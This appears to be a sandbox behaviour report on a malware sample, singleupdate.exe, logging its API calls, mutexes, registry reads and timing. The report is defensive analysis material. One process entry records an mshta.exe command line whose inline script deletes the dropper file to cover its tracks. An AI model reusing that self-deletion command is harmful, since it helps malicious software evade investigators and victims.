Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeType, address_out = 0x75bca5e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantCopy, address_out = 0x75be9dc0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantClear, address_out = 0x75be9db0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantInit, address_out = 0x75be9de0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x75efee90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x75bca610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x75c152c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x75c16560	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x75bed610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x75bee3e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x75bedb10	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x75c15800	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x75c161a0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x75c16400	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x75be3200	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x75c16610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x75c167b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x75bd60b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarI4FromStr, address_out = 0x75bd6ec0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromStr, address_out = 0x75be3010	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR8FromStr, address_out = 0x75be3630	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromStr, address_out = 0x75bd8b90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyFromStr, address_out = 0x75bc2d90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBoolFromStr, address_out = 0x75bd48f0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75bd7f50	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75bd89c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75bd48a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75ededc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Heap32ListFirst, address_out = 0x75edf1a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Heap32ListNext, address_out = 0x75edf250	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Heap32First, address_out = 0x75edf2f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Heap32Next, address_out = 0x75edf510	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Toolhelp32ReadProcessMemory, address_out = 0x75ea8830	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32First, address_out = 0x75edf810	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32Next, address_out = 0x75edf9a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75edf750	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75edf8f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Thread32First, address_out = 0x75edfa80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Thread32Next, address_out = 0x75edfb30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x75edfc90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32Next, address_out = 0x75edfe30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32FirstW, address_out = 0x75edfbd0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32NextW, address_out = 0x75edfd80	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0	249	Fn
Map	-	process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ	249	Fn

Driver (1)

Operation	Driver	Additional Information	Success	Count	Logfile
Control	System Paging File	control_code = 0x900c0		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = SysTreeView32, wndproc_parameter = 0		1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = 0, result_out = 4		1	Fn

System (988)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS	249	Fn
Get Cursor	x_out = 424, y_out = 408	626	Fn
Get Cursor	x_out = 849, y_out = 234	3	Fn
Sleep	duration = 1 milliseconds (0.001 seconds)	103	Fn
Sleep	duration = 500 milliseconds (0.500 seconds)	1	Fn
Get Time	type = Local Time, time = 2019-04-12 11:17:56 (Local Time)	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:26 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 25354759931	1	Fn
Get Time	type = Ticks, time = 267375	2	Fn
Get Info	type = Operating System	1	Fn

Mutex (352)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = shwlwook		1	Fn
Open	mutex_name = {83BD0373-038A-4EFA-AD88-EA97DCAB3494}, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE		351	Fn

Environment (122)

Operation	Additional Information	Count	Logfile
Get Environment String	-	2	Fn Data
Get Environment String	name = ALLUSERSPROFILE, result_out = C:\ProgramData	30	Fn
Get Environment String	name = APPDATA, result_out = C:\Users\FD1HVy\AppData\Roaming	30	Fn
Get Environment String	name = ProgramData, result_out = C:\ProgramData	30	Fn
Get Environment String	name = WINDIR, result_out = C:\WINDOWS	30	Fn

Process #9: mshta.exe

1866

Information	Value
ID	#9
File Name	c:\windows\syswow64\mshta.exe
Command Line	mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('singleupdate.exe');close()}catch(e){}},10);"
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:03:32, Reason: Child Process
Unmonitor	End Time: 00:04:11, Reason: Self Terminated
Monitor Duration	00:00:39

OS Process Information

Information	Value
PID	0xfe4
Parent PID	0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E0 0x CE0 0x 9FC 0x F94 0x 84 0x 86C 0x EE8 0x F9C 0x C48 0x D98 0x F40 0x 9E4 0x 824 0x EA8 0x F38

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
jscript9.dll	0x71620000	0x719A4FFF	Marked Writable	-	32-bit	-	... Region Actions Download Dump
mshta.exe	0x01320000	0x01327FFF	Forced	-	32-bit	-	... Region Actions Download Dump
buffer	0x067F0000	0x0680FFFF	Marked Executable	-	32-bit	-	... Region Actions Download Dump

Host Behavior

COM (5)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	3050F5C8-98B5-11CF-BB82-00AA00BDCE0B	00000000-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	50D5107A-D278-4871-8989-F4CEAAF59CFC	08C0E040-62D1-11D1-9326-0060B067B86E	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD	1	Fn
Create	16D51579-A30B-4C8B-A276-0FF4DC41E755	BB1A2AE1-A4F9-11CF-8F20-00805F2CD064	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	842A1268-6E6A-465C-868F-8BC445B9828F	8F88FD19-5D42-477B-BD45-F6A4A977ED05	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	Scripting.FileSystemObject	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn

File (1)

Operation	Filename	Additional Information	Success	Count	Logfile
Open Mapping	#MSHTML#PERF#00000FE4	desired_access = FILE_MAP_WRITE		1	Fn

Registry (11)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\EUDC\1252	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32	data = C:\Windows\SysWOW64\mshtml.dll, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	value_name = Path, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility	value_name = mshta.exe, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	value_name = NoFileMenu	1	Fn

Module (55)

Operation	Module	Additional Information	Count	Logfile
Load	WLDP.DLL	base_address = 0x72dc0000	1	Fn
Load	C:\Windows\SysWOW64\mshtml.dll	base_address = 0x726c0000	1	Fn
Load	comctl32.dll	base_address = 0x72440000	1	Fn
Load	urlmon.dll	base_address = 0x74100000	1	Fn
Load	WLDP.DLL	base_address = 0x72360000	1	Fn
Load	ext-ms-win-ntuser-touch-hittest-l1-1-0.dll	base_address = 0x74b70000	1	Fn
Load	OLEACC.DLL	base_address = 0x71f20000	1	Fn
Load	mshtml.dll	base_address = 0x726c0000	2	Fn
Load	api-ms-win-core-winrt-l1-1-0.dll	base_address = 0x75c50000	1	Fn
Load	api-ms-win-core-winrt-string-l1-1-0.dll	base_address = 0x75c50000	1	Fn
Get Handle	c:\windows\syswow64\mshta.exe	base_address = 0x1320000	3	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	5	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x74b70000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x71620000	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x71620000	1	Fn
Get Handle	c:\windows\syswow64\kernelbase.dll	base_address = 0x74ea0000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x75bb0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77bb0000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	2	Fn
Get Filename	c:\windows\syswow64\mshta.exe	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSetInformation, address_out = 0x75ea5850	3	Fn
Get Address	c:\windows\syswow64\wldp.dll	function = WldpGetLockdownPolicy, address_out = 0x72dc3c20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RegisterApplicationRestart, address_out = 0x75eb1080	1	Fn
Get Address	c:\windows\syswow64\mshtml.dll	function = RunHTMLApplication, address_out = 0x7322a7e0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetCoalescableTimer, address_out = 0x74ba3c80	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = 471, address_out = 0x741845d0	1	Fn
Get Address	c:\windows\syswow64\wldp.dll	function = WldpGetLockdownPolicy, address_out = 0x72363c20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50	1	Fn
Get Address	c:\windows\syswow64\oleacc.dll	function = LresultFromObject, address_out = 0x71f2f590	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryProtectedPolicy, address_out = 0x74f71cd0	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadedAPI, address_out = 0x74f9a730	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0	1	Fn
Get Address	c:\windows\syswow64\combase.dll	function = WindowsCreateStringReference, address_out = 0x75d0a150	1	Fn
Get Address	c:\windows\syswow64\combase.dll	function = RoGetActivationFactory, address_out = 0x75d00fa0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDllShutdownInProgress, address_out = 0x77bdbbe0	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn

Window (14)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	wndproc_parameter = 0	1	Fn
Create	-	wndproc_parameter = 79822848	1	Fn
Create	-	wndproc_parameter = 79725264	1	Fn
Find	-	class_name = MS_AutodialMonitor	1	Fn
Find	-	class_name = MS_WebCheckMonitor	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264	2	Fn
Set Attribute	-	index = -21, new_long = 79822848	1	Fn
Set Attribute	-	index = -21, new_long = 79725264	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = -20, new_long = 262144	1	Fn
Set Attribute	-	index = -21, new_long = 0	1	Fn
Set Attribute	-	index = -21, new_long = 0	1	Fn

Keyboard (190)

Operation	Additional Information	Count	Logfile
Get Info	type = KB_LOCALE_ID	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID_NAME, result_out = 00000409	1	Fn
Read	virtual_key_code = VK_LBUTTON, result_out = 0	8	Fn
Read	virtual_key_code = VK_RBUTTON, result_out = 0	8	Fn
Read	virtual_key_code = VK_SHIFT, result_out = 0	31	Fn
Read	virtual_key_code = VK_CONTROL, result_out = 0	31	Fn
Read	virtual_key_code = VK_MBUTTON, result_out = 0	8	Fn
Read	virtual_key_code = VK_MENU, result_out = 0	31	Fn
Read	virtual_key_code = VK_LSHIFT, result_out = 0	23	Fn
Read	virtual_key_code = VK_LCONTROL, result_out = 0	23	Fn
Read	virtual_key_code = VK_LMENU, result_out = 0	23	Fn

System (1082)

Operation	Additional Information	Count	Logfile
Get window text	window_text = 13624388	1	Fn
Get Cursor	x_out = 849, y_out = 234	2	Fn
Get Cursor	x_out = 266, y_out = 52	23	Fn
Sleep	duration = -1 (infinite)	14	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	3	Fn
Get Time	type = Ticks, time = 222703	2	Fn
Get Time	type = Ticks, time = 226437	1	Fn
Get Time	type = Performance Ctr, time = 22647284250	1	Fn
Get Time	type = Performance Ctr, time = 22731453167	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:00 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 22731465438	1	Fn
Get Time	type = Performance Ctr, time = 22771456252	1	Fn
Get Time	type = Performance Ctr, time = 22771539293	1	Fn
Get Time	type = Performance Ctr, time = 22771564801	1	Fn
Get Time	type = Performance Ctr, time = 22771569811	1	Fn
Get Time	type = Performance Ctr, time = 22771575282	1	Fn
Get Time	type = Performance Ctr, time = 22771603438	1	Fn
Get Time	type = Performance Ctr, time = 22771639492	1	Fn
Get Time	type = Ticks, time = 227687	1	Fn
Get Time	type = Performance Ctr, time = 22771752393	1	Fn
Get Time	type = Performance Ctr, time = 22837280527	1	Fn
Get Time	type = Performance Ctr, time = 22837340735	1	Fn
Get Time	type = Performance Ctr, time = 22845801553	1	Fn
Get Time	type = Performance Ctr, time = 22847078555	1	Fn
Get Time	type = Performance Ctr, time = 22847105190	1	Fn
Get Time	type = Performance Ctr, time = 22848637044	1	Fn
Get Time	type = Performance Ctr, time = 22848664283	1	Fn
Get Time	type = Performance Ctr, time = 22881838682	1	Fn
Get Time	type = Performance Ctr, time = 22881884222	1	Fn
Get Time	type = Performance Ctr, time = 22883010011	1	Fn
Get Time	type = Performance Ctr, time = 22883043049	1	Fn
Get Time	type = Performance Ctr, time = 22888426709	1	Fn
Get Time	type = Performance Ctr, time = 22888460499	1	Fn
Get Time	type = Performance Ctr, time = 22888485314	1	Fn
Get Time	type = Performance Ctr, time = 22888515123	1	Fn
Get Time	type = Performance Ctr, time = 22890829085	1	Fn
Get Time	type = Performance Ctr, time = 22890861430	1	Fn
Get Time	type = Performance Ctr, time = 22893950482	1	Fn
Get Time	type = Performance Ctr, time = 22893983145	1	Fn
Get Time	type = Performance Ctr, time = 22895515499	1	Fn
Get Time	type = Performance Ctr, time = 22895546908	1	Fn
Get Time	type = Performance Ctr, time = 22897071609	1	Fn
Get Time	type = Performance Ctr, time = 22897100783	1	Fn
Get Time	type = Performance Ctr, time = 22900198026	1	Fn
Get Time	type = Performance Ctr, time = 22900223685	1	Fn
Get Time	type = Performance Ctr, time = 22901786843	1	Fn
Get Time	type = Performance Ctr, time = 22901799115	1	Fn
Get Time	type = Performance Ctr, time = 22904891798	1	Fn
Get Time	type = Performance Ctr, time = 22904903994	1	Fn
Get Time	type = Performance Ctr, time = 22948646571	1	Fn
Get Time	type = Performance Ctr, time = 22948659773	1	Fn
Get Time	type = Performance Ctr, time = 22948682249	1	Fn
Get Time	type = Performance Ctr, time = 22948694315	1	Fn
Get Time	type = Performance Ctr, time = 22950206748	1	Fn
Get Time	type = Performance Ctr, time = 22950219232	1	Fn
Get Time	type = Performance Ctr, time = 22962361746	1	Fn
Get Time	type = Performance Ctr, time = 22962376056	1	Fn
Get Time	type = Performance Ctr, time = 22963857716	1	Fn
Get Time	type = Performance Ctr, time = 22963870290	1	Fn
Get Time	type = Performance Ctr, time = 22965446905	1	Fn
Get Time	type = Performance Ctr, time = 22965459396	1	Fn
Get Time	type = Performance Ctr, time = 22968559611	1	Fn
Get Time	type = Performance Ctr, time = 22968572173	1	Fn
Get Time	type = Performance Ctr, time = 22971685909	1	Fn
Get Time	type = Performance Ctr, time = 22971698547	1	Fn
Get Time	type = Performance Ctr, time = 22975459066	1	Fn
Get Time	type = Performance Ctr, time = 22975471578	1	Fn
Get Time	type = Performance Ctr, time = 22978576046	1	Fn
Get Time	type = Performance Ctr, time = 22978591901	1	Fn
Get Time	type = Performance Ctr, time = 23013168165	1	Fn
Get Time	type = Performance Ctr, time = 23013180690	1	Fn
Get Time	type = Performance Ctr, time = 23016065460	1	Fn
Get Time	type = Performance Ctr, time = 23016078449	1	Fn
Get Time	type = Performance Ctr, time = 23019180810	1	Fn
Get Time	type = Performance Ctr, time = 23019192744	1	Fn
Get Time	type = Performance Ctr, time = 23020758024	1	Fn
Get Time	type = Performance Ctr, time = 23020772782	1	Fn
Get Time	type = Performance Ctr, time = 23023904162	1	Fn
Get Time	type = Performance Ctr, time = 23023916802	1	Fn
Get Time	type = Performance Ctr, time = 23025446079	1	Fn
Get Time	type = Performance Ctr, time = 23025461719	1	Fn
Get Time	type = Performance Ctr, time = 23028561918	1	Fn
Get Time	type = Performance Ctr, time = 23028574335	1	Fn
Get Time	type = Performance Ctr, time = 23031696847	1	Fn
Get Time	type = Performance Ctr, time = 23031712951	1	Fn
Get Time	type = Performance Ctr, time = 23034870394	1	Fn
Get Time	type = Performance Ctr, time = 23034887897	1	Fn
Get Time	type = Performance Ctr, time = 23037943072	1	Fn
Get Time	type = Performance Ctr, time = 23037959229	1	Fn
Get Time	type = Performance Ctr, time = 23041062514	1	Fn
Get Time	type = Performance Ctr, time = 23041075023	1	Fn
Get Time	type = Performance Ctr, time = 23044197915	1	Fn
Get Time	type = Performance Ctr, time = 23044213950	1	Fn
Get Time	type = Performance Ctr, time = 23045785528	1	Fn
Get Time	type = Performance Ctr, time = 23045801955	1	Fn
Get Time	type = Performance Ctr, time = 23048889301	1	Fn
Get Time	type = Performance Ctr, time = 23048906006	1	Fn
Get Time	type = Performance Ctr, time = 23052013287	1	Fn
Get Time	type = Performance Ctr, time = 23052029576	1	Fn
Get Time	type = Performance Ctr, time = 23055138392	1	Fn
Get Time	type = Performance Ctr, time = 23055150957	1	Fn
Get Time	type = Performance Ctr, time = 23058279606	1	Fn
Get Time	type = Performance Ctr, time = 23058291657	1	Fn
Get Time	type = Performance Ctr, time = 23059814537	1	Fn
Get Time	type = Performance Ctr, time = 23059826689	1	Fn
Get Time	type = Performance Ctr, time = 23061385557	1	Fn
Get Time	type = Performance Ctr, time = 23061400622	1	Fn
Get Time	type = Performance Ctr, time = 23064519353	1	Fn
Get Time	type = Performance Ctr, time = 23064535643	1	Fn
Get Time	type = Performance Ctr, time = 23070486892	1	Fn
Get Time	type = Performance Ctr, time = 23070509103	1	Fn
Get Time	type = Performance Ctr, time = 23070540862	1	Fn
Get Time	type = Performance Ctr, time = 23070558054	1	Fn
Get Time	type = Performance Ctr, time = 23070766049	1	Fn
Get Time	type = Performance Ctr, time = 23070783741	1	Fn
Get Time	type = Performance Ctr, time = 23073900576	1	Fn
Get Time	type = Performance Ctr, time = 23073917775	1	Fn
Get Time	type = Performance Ctr, time = 23077016772	1	Fn
Get Time	type = Performance Ctr, time = 23077033875	1	Fn
Get Time	type = Performance Ctr, time = 23078567617	1	Fn
Get Time	type = Performance Ctr, time = 23078583743	1	Fn
Get Time	type = Performance Ctr, time = 23080150279	1	Fn
Get Time	type = Performance Ctr, time = 23080166769	1	Fn
Get Time	type = Performance Ctr, time = 23083274009	1	Fn
Get Time	type = Performance Ctr, time = 23083289809	1	Fn
Get Time	type = Performance Ctr, time = 23086380941	1	Fn
Get Time	type = Performance Ctr, time = 23086393390	1	Fn
Get Time	type = Performance Ctr, time = 23087940134	1	Fn
Get Time	type = Performance Ctr, time = 23087952723	1	Fn
Get Time	type = Performance Ctr, time = 23091067354	1	Fn
Get Time	type = Performance Ctr, time = 23091080179	1	Fn
Get Time	type = Performance Ctr, time = 23092646621	1	Fn
Get Time	type = Performance Ctr, time = 23092659052	1	Fn
Get Time	type = Performance Ctr, time = 23094188956	1	Fn
Get Time	type = Performance Ctr, time = 23094201213	1	Fn
Get Time	type = Performance Ctr, time = 23095762736	1	Fn
Get Time	type = Performance Ctr, time = 23095774979	1	Fn
Get Time	type = Performance Ctr, time = 23098882066	1	Fn
Get Time	type = Performance Ctr, time = 23098894638	1	Fn
Get Time	type = Performance Ctr, time = 23100443952	1	Fn
Get Time	type = Performance Ctr, time = 23100459870	1	Fn
Get Time	type = Performance Ctr, time = 23103588659	1	Fn
Get Time	type = Performance Ctr, time = 23103602573	1	Fn
Get Time	type = Performance Ctr, time = 23106687308	1	Fn
Get Time	type = Performance Ctr, time = 23106699633	1	Fn
Get Time	type = Performance Ctr, time = 23109816921	1	Fn
Get Time	type = Performance Ctr, time = 23109832897	1	Fn
Get Time	type = Performance Ctr, time = 23112945307	1	Fn
Get Time	type = Performance Ctr, time = 23112957811	1	Fn
Get Time	type = Performance Ctr, time = 23124351215	1	Fn
Get Time	type = Performance Ctr, time = 23124367099	1	Fn
Get Time	type = Performance Ctr, time = 23127004510	1	Fn
Get Time	type = Performance Ctr, time = 23127017280	1	Fn
Get Time	type = Performance Ctr, time = 23128576432	1	Fn
Get Time	type = Performance Ctr, time = 23128589447	1	Fn
Get Time	type = Performance Ctr, time = 23131691784	1	Fn
Get Time	type = Performance Ctr, time = 23131705923	1	Fn
Get Time	type = Performance Ctr, time = 23134859374	1	Fn
Get Time	type = Performance Ctr, time = 23134872373	1	Fn
Get Time	type = Performance Ctr, time = 23136383408	1	Fn
Get Time	type = Performance Ctr, time = 23136396628	1	Fn
Get Time	type = Performance Ctr, time = 23139688750	1	Fn
Get Time	type = Performance Ctr, time = 23139707620	1	Fn
Get Time	type = Performance Ctr, time = 23142641256	1	Fn
Get Time	type = Performance Ctr, time = 23142657316	1	Fn
Get Time	type = Performance Ctr, time = 23145782902	1	Fn
Get Time	type = Performance Ctr, time = 23145795254	1	Fn
Get Time	type = Performance Ctr, time = 23148878286	1	Fn
Get Time	type = Performance Ctr, time = 23148891005	1	Fn
Get Time	type = Performance Ctr, time = 23150435459	1	Fn
Get Time	type = Performance Ctr, time = 23150448033	1	Fn
Get Time	type = Performance Ctr, time = 23152005041	1	Fn
Get Time	type = Performance Ctr, time = 23152017287	1	Fn
Get Time	type = Performance Ctr, time = 23155136252	1	Fn
Get Time	type = Performance Ctr, time = 23155148723	1	Fn
Get Time	type = Performance Ctr, time = 23158287789	1	Fn
Get Time	type = Performance Ctr, time = 23158300311	1	Fn
Get Time	type = Performance Ctr, time = 23161382791	1	Fn
Get Time	type = Performance Ctr, time = 23161395673	1	Fn
Get Time	type = Performance Ctr, time = 23164504871	1	Fn
Get Time	type = Performance Ctr, time = 23164517908	1	Fn
Get Time	type = Performance Ctr, time = 23167633572	1	Fn
Get Time	type = Performance Ctr, time = 23167646586	1	Fn
Get Time	type = Performance Ctr, time = 23170762774	1	Fn
Get Time	type = Performance Ctr, time = 23170775662	1	Fn
Get Time	type = Performance Ctr, time = 23172500808	1	Fn
Get Time	type = Performance Ctr, time = 23172517969	1	Fn
Get Time	type = Performance Ctr, time = 23175486450	1	Fn
Get Time	type = Performance Ctr, time = 23175499448	1	Fn
Get Time	type = Performance Ctr, time = 23177013266	1	Fn
Get Time	type = Performance Ctr, time = 23177027554	1	Fn
Get Time	type = Performance Ctr, time = 23178609837	1	Fn
Get Time	type = Performance Ctr, time = 23178626027	1	Fn
Get Time	type = Performance Ctr, time = 23183773686	1	Fn
Get Time	type = Performance Ctr, time = 23183786382	1	Fn
Get Time	type = Performance Ctr, time = 23184824376	1	Fn
Get Time	type = Performance Ctr, time = 23184836979	1	Fn
Get Time	type = Performance Ctr, time = 23187951349	1	Fn
Get Time	type = Performance Ctr, time = 23188111209	1	Fn
Get Time	type = Performance Ctr, time = 23189630999	1	Fn
Get Time	type = Performance Ctr, time = 23189648075	1	Fn
Get Time	type = Performance Ctr, time = 23197414381	1	Fn
Get Time	type = Performance Ctr, time = 23197431103	1	Fn
Get Time	type = Performance Ctr, time = 23197499187	1	Fn
Get Time	type = Performance Ctr, time = 23197515395	1	Fn
Get Time	type = Performance Ctr, time = 23198970051	1	Fn
Get Time	type = Performance Ctr, time = 23198990060	1	Fn
Get Time	type = Performance Ctr, time = 23202041455	1	Fn
Get Time	type = Performance Ctr, time = 23202058528	1	Fn
Get Time	type = Performance Ctr, time = 23220869369	1	Fn
Get Time	type = Performance Ctr, time = 23220881949	1	Fn
Get Time	type = Performance Ctr, time = 23223894660	1	Fn
Get Time	type = Performance Ctr, time = 23223908826	1	Fn
Get Time	type = Performance Ctr, time = 23225477906	1	Fn
Get Time	type = Performance Ctr, time = 23225490712	1	Fn
Get Time	type = Performance Ctr, time = 23298143286	1	Fn
Get Time	type = Performance Ctr, time = 23298160372	1	Fn
Get Time	type = Performance Ctr, time = 23298410503	1	Fn
Get Time	type = Performance Ctr, time = 23298424352	1	Fn
Get Time	type = Performance Ctr, time = 23300448210	1	Fn
Get Time	type = Performance Ctr, time = 23300461444	1	Fn
Get Time	type = Performance Ctr, time = 23302016969	1	Fn
Get Time	type = Performance Ctr, time = 23302029821	1	Fn
